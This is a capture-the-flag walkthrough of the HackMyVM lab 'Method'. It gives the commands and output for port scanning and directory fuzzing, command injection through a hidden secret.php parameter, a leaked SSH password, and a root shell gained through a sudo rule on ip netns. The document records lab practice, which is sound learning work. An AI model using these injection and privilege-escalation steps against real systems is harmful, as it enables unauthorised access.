NOTES ABOUT Method

[ 2022-10-23 ] [ HackMyVM / Method ]

Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, Sudo
Tools: nmap, ssh, gobuster, curl, sudo ip

PORT SCANNING

  1. $ nmap -T4 -sCSV -p- 10.0.2.37
  2.  
  3. PORT   STATE SERVICE VERSION
  4. 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
  5. | ssh-hostkey: 
  6. |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
  7. |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
  8. |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
  9. 80/tcp open  http    nginx 1.18.0
  10. |_http-title: Test Page for the Nginx HTTP Server on Fedora
  11. |_http-server-header: nginx/1.18.0

GETTING IN

  1. $ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.37 --exclude-length 3690
  2. /index.htm            (Status: 200) [Size: 344]
  3. /sitemap.xml          (Status: 200) [Size: 285]
  4. /note.txt             (Status: 200) [Size: 23] 
  5. /secret.php           (Status: 302) [Size: 0] [--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]
  6.  
  7. $ curl 10.0.2.37/sitemap.xml
  8. <?xml version="1.0" encoding="UTF-8"?>
  9. <urlset xmlns="https://hackmyvm/sitemap/0.9">
  10.    <url>
  11.       <loc>https://hackmyvm.eu/machines/index.htm?vm=Brain</loc>
  12.       <lastmod>2020-02-13</lastmod>
  13.       <changefreq>monthly</changefreq>
  14.       <priority>0.8</priority>
  15.    </url>
  16. </urlset>
  17.  
  18. $ curl 10.0.2.37/index.htm?vm=Brain
  19. <h1>It\'s Hacking Time</h1>
  20. <img src="hacker.gif" alt="Hacker" height="640" width="640"> 
  21. <img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640"> 
  22. <form action="/secret.php" hidden="true" method="GET">
  23.      <input type="text" name="HackMyVM" value="" maxlength="100"><br>
  24.      <input type="submit" value="Submit">
  25. </form>
  26.  
  27. $ curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=id'
  28. You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
  29. </pre>

ELEVATING PRIVILEGES

  1. curl -X POST 'http://10.0.2.37/secret.php' -d 'HackMyVM=cat secret.php'
  2. You Found ME : - (<pre><?php
  3. [...]
  4. $ok="prakasaka:th3-!llum!n@t0r";
  5. ?>
  6. </pre> 

  1. $ ssh prakasaka@10.0.2.37                 
  2. prakasaka@10.0.2.37\'s password:
  3.  
  4. prakasaka@method:~$ sudo -l
  5. Matching Defaults entries for prakasaka on method:
  6.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  7.  
  8. User prakasaka may run the following commands on method:
  9.     (!root) NOPASSWD: /bin/bash
  10.     (root) /bin/ip
  11.  
  12. prakasaka@method:~$ cat user.txt 
  13. ********************
  14.  
  15. prakasaka@method:~$ sudo /bin/ip netns add foo
  16. prakasaka@method:~$ sudo /bin/ip netns exec foo /bin/bash
  17.  
  18. root@method:~# cat root.txt 
  19. ********************

  1. root@method:~# init 0
  2. root@method:~# Connection to 10.0.2.37 closed by remote host.
  3. Connection to 10.0.2.37 closed.

--- Loaded 524 times ---